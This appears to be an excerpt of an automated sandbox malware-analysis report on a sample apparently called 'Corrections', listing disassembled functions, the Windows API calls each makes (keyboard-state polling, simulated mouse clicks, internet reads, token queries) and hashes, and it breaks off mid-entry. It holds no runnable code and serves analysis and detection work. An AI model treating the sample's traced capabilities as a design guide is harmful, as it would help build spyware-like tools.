SendMessageW.USER32(00000002,00001036,00000000,?), ref: 009B76AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0099B5BE,00000000,00000000), ref: 009B76D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 009B76FF

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: d455200ac3a793b4bd0d83c1ab01ecddab1bf0de8ba066edcf07d6503792e211
Instruction ID: 3c6f864be5feaa8b79d96a6ca9056c73c2cf93fd7fb177b1d471f2f8b553f845
Opcode Fuzzy Hash: d455200ac3a793b4bd0d83c1ab01ecddab1bf0de8ba066edcf07d6503792e211
Instruction Fuzzy Hash: 0B41E235A08504EFC7248FACCE88FE9BBA9EB89370F150364F815A72E0D670ED40DA51

Function 009523C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00952433
_free.LIBCMT ref: 00952453

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 3b0f5b6367053c3dffc6f3c16e37a2044ad6c2cb861582f64dc753e5549ea24a
Instruction ID: 56f81522e5e3c73af79abe2bb6fc73aef0b636d76b9288b9d22fc952f1bc07b9
Opcode Fuzzy Hash: 3b0f5b6367053c3dffc6f3c16e37a2044ad6c2cb861582f64dc753e5549ea24a
Instruction Fuzzy Hash: 1341E332A002009FCB20DF79C881A6EB3F5EF8A315F2585A8E915EB391D731ED05DB80

Function 009219CD Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 009219E1
ScreenToClient.USER32(00000000,?), ref: 009219FE
GetAsyncKeyState.USER32(00000001), ref: 00921A23
GetAsyncKeyState.USER32(00000002), ref: 00921A3D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 06fd5234d2cb78e7ab4419b694dbf82c5df2b91714a220f6646047e8836df823
Instruction ID: d50234995c74fa545964bd7d2e180e19ad2e6a57c42cbd0f0a6581a72e1cfd61
Opcode Fuzzy Hash: 06fd5234d2cb78e7ab4419b694dbf82c5df2b91714a220f6646047e8836df823
Instruction Fuzzy Hash: 7A418E71A0811AFFDF15DFA8D844BEEB774FB16324F20831AE429A2290D7346A50DB91

Function 009942B9 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00994310
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00994367
TranslateMessage.USER32(?), ref: 00994390
DispatchMessageW.USER32(?), ref: 0099439A
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 009943AB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 0f0d83b6f57483dfa21c43bc7b36315e6218f23ec9bcc8bbf3286a0f1f216d9d
Instruction ID: 98649efb7e25eeccf645cc03b6425875a2716f51ca077ff004a4c2b476733e60
Opcode Fuzzy Hash: 0f0d83b6f57483dfa21c43bc7b36315e6218f23ec9bcc8bbf3286a0f1f216d9d
Instruction Fuzzy Hash: B6318670518346DEEF3ACB7CDE4AFB63BACAB01308F144569E466821A0E7A59486DB11

Function 0098224E Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00982262
PostMessageW.USER32(00000001,00000201,00000001), ref: 0098230E
Sleep.KERNEL32(00000000,?,?,?), ref: 00982316
PostMessageW.USER32(00000001,00000202,00000000), ref: 00982327
Sleep.KERNEL32(00000000,?,?,?,?), ref: 0098232F

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 3a98defad0bc7f187914959eed938a41067c61cff941b872068847a952d1e6fb
Instruction ID: 2f15049bb80ba3818f8168ad519afcba0c59f1ac8df9bad9ee14a07bed3e5db8
Opcode Fuzzy Hash: 3a98defad0bc7f187914959eed938a41067c61cff941b872068847a952d1e6fb
Instruction Fuzzy Hash: EE31D171904219EFDB18DFA8CD8DADE3BB5EB04325F104229F925EB2D0D774A944DB90

Function 0099D95F Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,0099CC63,00000000), ref: 0099D97D
InternetReadFile.WININET(?,00000000,?,?), ref: 0099D9B4
GetLastError.KERNEL32(?,00000000,?,?,?,0099CC63,00000000), ref: 0099D9F9
SetEvent.KERNEL32(?,?,00000000,?,?,?,0099CC63,00000000), ref: 0099DA0D
SetEvent.KERNEL32(?,?,00000000,?,?,?,0099CC63,00000000), ref: 0099DA37

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: 76a823190cd8930d735dc5b929cecd8a1d042aeb2ef0b4be22d89c36d895193c
Instruction ID: cd21ec143ca5ded55aff7813a7e2ec8d0046bf479f2e10a06eed85d625546f93
Opcode Fuzzy Hash: 76a823190cd8930d735dc5b929cecd8a1d042aeb2ef0b4be22d89c36d895193c
Instruction Fuzzy Hash: 8A314B71506205EFDF20EFA9D8C5AAAB7FCEF54354B10442EE546D2250E730AE40DB60

Function 009B61A5 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001053,000000FF,?), ref: 009B61E4
SendMessageW.USER32(?,00001074,?,00000001), ref: 009B623C
_wcslen.LIBCMT ref: 009B624E
_wcslen.LIBCMT ref: 009B6259
SendMessageW.USER32(?,00001002,00000000,?), ref: 009B62B5

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$_wcslen
String ID:
API String ID: 763830540-0
Opcode ID: 1b508ec4426640bc32c51e504c4e1f30cb0d150c3de968dc3954e02c1063a021
Instruction ID: c1c3656aaebccaa9bd5a5d919cdaa80d613d13093b21e0b7277b91be05fe14bc
Opcode Fuzzy Hash: 1b508ec4426640bc32c51e504c4e1f30cb0d150c3de968dc3954e02c1063a021
Instruction Fuzzy Hash: EA2191719142189AEB109FA4CD84FEEBBBCFB44334F14421AFA25EB180DB749985CF50

Function 009A138D Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 009A13AE
GetForegroundWindow.USER32 ref: 009A13C5
GetDC.USER32(00000000), ref: 009A1401
GetPixel.GDI32(00000000,?,00000003), ref: 009A140D
ReleaseDC.USER32(00000000,00000003), ref: 009A1445

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 878690a2cb78ae25686d0659d27e49bd70ebb837e9e3a97da227a7ae5b32da8c
Instruction ID: 099c42e3ca30afab0398df5dc8b6b7c4f8064e82d0ccb468813fb948c672519c
Opcode Fuzzy Hash: 878690a2cb78ae25686d0659d27e49bd70ebb837e9e3a97da227a7ae5b32da8c
Instruction Fuzzy Hash: 2921AE36605214AFDB04EF69D984A9EB7F9EF88310B048439E84A97351DA30AC04DF90

Function 0095D13D Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 0095D146
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0095D169

Part of subcall function 00953B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00946A79,?,0000015D,?,?,?,?,009485B0,000000FF,00000000,?,?), ref: 00953BC5

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0095D18F
_free.LIBCMT ref: 0095D1A2
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0095D1B1

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 8de11faa9beed3f951fb0cfcdd02923f0521620ff5528a454df5b1d93e4c24ff
Instruction ID: a02dc6d05a240aaf003e4f785be9676ee2ef44198e4b160188a4a85b40e2da32
Opcode Fuzzy Hash: 8de11faa9beed3f951fb0cfcdd02923f0521620ff5528a454df5b1d93e4c24ff
Instruction Fuzzy Hash: 0401847661FA157F3335A7BB5C8CD7B6A6DDEC2BA23140229FD04C6244EA608D0593F0

Function 00986078 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 0098608D
_memcmp.LIBVCRUNTIME ref: 009860AB
_memcmp.LIBVCRUNTIME ref: 009860BE
_memcmp.LIBVCRUNTIME ref: 009860D6
_memcmp.LIBVCRUNTIME ref: 009860EE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: b116e0cd32065da24a7b9885b4b58a3f3964da57275ddcd8b6749dd1f8b7a9aa
Instruction ID: b17171cfa1858d0e883b1abc2634d84a9830b85f2f28ec44ad840069f5f37fe0
Opcode Fuzzy Hash: b116e0cd32065da24a7b9885b4b58a3f3964da57275ddcd8b6749dd1f8b7a9aa
Instruction Fuzzy Hash: 6801B5B2A44305BBDA14BA22DC82FAB735D9ED139CF004425FD069E342E765ED50C3AA

Function 0095316B Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0000000A,?,?,0094F64E,0094545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00953170
_free.LIBCMT ref: 009531A5
_free.LIBCMT ref: 009531CC
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009531D9
SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 009531E2

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 1c78b0cc8be318d09b47f222c1c456f939243d928ec0ab07528d49b2b2636ffe
Instruction ID: 78bc933557c6bd7fdc86830dba6db770fdeaaef4ae5520137145467e7c1d9e46
Opcode Fuzzy Hash: 1c78b0cc8be318d09b47f222c1c456f939243d928ec0ab07528d49b2b2636ffe
Instruction Fuzzy Hash: 0801D67665DE006B9612E7379C85E2A276D9BD13F77204928FC1592182FE258A0D6350

Function 009808FE Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?,?,00980C4E), ref: 0098091B
ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980936
lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980944
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?), ref: 00980954
CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00980831,80070057,?,?), ref: 00980960

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: fa4c1f29025af3befa971768dbf85fe59ec7533104c9a90ec02e4ca5c01bbea0
Instruction ID: d16e172b3322315860c68eedd1f0b728f8f8d40ea4d4de463f89b3098d900887
Opcode Fuzzy Hash: fa4c1f29025af3befa971768dbf85fe59ec7533104c9a90ec02e4ca5c01bbea0
Instruction Fuzzy Hash: 1B01F272611208BFEB405F54DC04B9A7BFCEF847A2F100228F905E2212F772CD00ABA0

Function 0098F292 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?), ref: 0098F2AE
QueryPerformanceFrequency.KERNEL32(?), ref: 0098F2BC
Sleep.KERNEL32(00000000), ref: 0098F2C4
QueryPerformanceCounter.KERNEL32(?), ref: 0098F2CE
Sleep.KERNEL32 ref: 0098F30A

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: 8e61e324ff70052a4551426e4b07797941314173dd4b0b1c21e707c4a6c04d83
Instruction ID: 164e2b484e9467df71db0bf36e080cc55aafb66e063eb7a8ed1950bdab993bbd
Opcode Fuzzy Hash: 8e61e324ff70052a4551426e4b07797941314173dd4b0b1c21e707c4a6c04d83
Instruction Fuzzy Hash: F6016975C0A619DBCF04AFA8E959AEEBB78FB08720F001566E511F2250EB309554DBA1

Function 00981A45 Relevance: 7.5, APIs: 5, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00981A60
GetLastError.KERNEL32(?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A6C
GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A7B
HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,009814E7,?,?,?), ref: 00981A82
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00981A99

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 2e4bb1ef3879087428de1ec3456b1baddaebaae7d23ca1d73ac08e420143b779
Instruction ID: 8a1fc0c4498932627f156816ad4ff36b0b5699d5a0b85b20c63f57f93d1d6b74
Opcode Fuzzy Hash: 2e4bb1ef3879087428de1ec3456b1baddaebaae7d23ca1d73ac08e420143b779
Instruction Fuzzy Hash: 470181B9616206BFDB155F64DD48D6A3B6DEF84374F210424F845D3360EA31DC419A60

Function 00981900 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00981916
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00981922
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00981931
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00981938
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0098194E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 93c8f1022670b0f9fe87206ebe95828afd1dc4ee9d6fa39d986cc43934ef87b3
Instruction ID: 823a7757eb175fce6c5081658baa63f5cb6829a5ee1825ab295096b22afa02f2
Opcode Fuzzy Hash: 93c8f1022670b0f9fe87206ebe95828afd1dc4ee9d6fa39d986cc43934ef87b3
Instruction Fuzzy Hash: 7AF0CD75215302ABDB212FA8ED4DF963BADEF893B0F100420FA05D72A0EB31DC019B60

Function 00981960 Relevance: 7.5, APIs: 5, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00981976
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00981982
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00981991
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00981998
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 009819AE

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 3e907035ed176f99b1c0294fa5eca02161ab550745a8be9f2f5cb344940bd4b6
Instruction ID: 1de0e25551d233854b1c0ea5adab039aa0b412fb69aa40e6b9318e1c0c3e905a
Opcode Fuzzy Hash: 3e907035ed176f99b1c0294fa5eca02161ab550745a8be9f2f5cb344940bd4b6
Instruction Fuzzy Hash: 71F0CD75215312ABDB212FA8ED58F563BADEF893B0F100520FA05C72A0EA31E8419B60

Function 00990CB6 Relevance: 7.5, APIs: 6, Instructions: 41COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CCB
CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CD8
CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CE5
CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CF2
CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990CFF
CloseHandle.KERNEL32(?,?,?,?,00990B24,?,00993D41,?,00000001,00963AF4,?), ref: 00990D0C

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0f6e78e021462244d70c11e9a6488952d79b14903c270b0a8845b090d503dd18
Instruction ID: b4dbef089ca9f0b301d841aa022119f67adba619e51775a52cb756f5284376cc
